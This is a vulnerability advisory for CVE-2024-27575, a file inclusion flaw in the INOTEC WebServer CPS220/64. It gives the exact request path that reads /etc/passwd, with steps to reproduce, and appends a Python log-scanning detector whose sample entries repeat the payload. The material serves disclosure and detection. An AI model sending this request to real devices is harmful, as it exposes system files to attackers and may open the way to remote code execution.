Created
March 22, 2024 05:39
CVE ID: CVE-2024-27575
Vulnerability Title: File Inclusion Vulnerability on INOTEC Sicherheitstechnik GmbH - WebServer CPS220/64 V.3.3.19
Description:
File Inclusion vulnerability in INOTEC Sicherheitstechnik GmbH WebServer CPS220/64 V.3.3.19 allows a remote attacker to read and access sensitive information, which may lead to remote code execution.
Vulnerability Type:
File Inclusion Vulnerability
Vendor of Product:
INOTEC Sicherheitstechnik GmbH
Affected Product Code Base:
INOTEC Sicherheitstechnik GmbH - WebServer CPS220/64 V.3.3.19 - INOTEC Sicherheitstechnik GmbH - WebServer CPS220/64 V.3.3.19
Affected Component:
WebServer CPS220/64 V.3.3.19
Vulnerable URL:
http://<ip address>/cgi-bin/display?file=/etc/passwd
Attack Type:
Remote
Impact Information Disclosure:
true
Attack Vectors:
Steps to reproduce the vulnerability:
Step 1: Access the INOTEC Sicherheitstechnik GmbH - WebServer CPS220/64 V.3.3.19 web URL.
Step 2: Navigate to the URL http://<ip address>/cgi-bin/display?file=/etc/passwd
Step 3: The /etc/passwd file from the machine is displayed.
Reference:
https://www.inotec-licht.de/
Discoverer:
Safvan Parakkal
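
Detection sketch for the request pattern described above, as an added example that is not part of the original advisory or any vendor code. It assumes web or proxy access logs in common log format and assumes legitimate `file` values are bare file names; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a common/combined log format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
ENDPOINT = "/cgi-bin/display"  # endpoint named in the advisory
PARAM = "file"                 # parameter named in the advisory

def fully_decode(value, rounds=3):
    """Normalise a value by undoing repeated percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_file_value(log_line):
    """Return the decoded `file` value if it points outside a bare file name, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if fully_decode(url.path).rstrip("/") != ENDPOINT:
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw).replace("\\", "/")
        # Assumption: normal values are never absolute paths or parent-directory references.
        if value.startswith("/") or ".." in value.split("/"):
            return value
    return None

def scan(lines):
    """Return (source address, decoded file value) for every flagged log line."""
    return [(ln.split()[0], v) for ln in lines if (v := suspicious_file_value(ln))]

# Constructed sample log lines (documentation address range), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Mar/2024:05:39:00 +0000] "GET /cgi-bin/display?file=/etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.11 - - [22/Mar/2024:05:40:10 +0000] "GET /cgi-bin/display?file=status.txt HTTP/1.1" 200 210',
    '192.0.2.12 - - [22/Mar/2024:05:41:30 +0000] "GET /cgi-bin/display?file=%2Fetc%2Fpasswd HTTP/1.1" 200 1432',
    '192.0.2.13 - - [22/Mar/2024:05:42:00 +0000] "GET /index.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for src, value in scan(SAMPLE_LOG):
        print(f"ALERT src={src} {PARAM}={value}")
```

The absolute-path rule should be tuned against the device's normal traffic before alerting on it, since the advisory does not describe what legitimate `file` values look like.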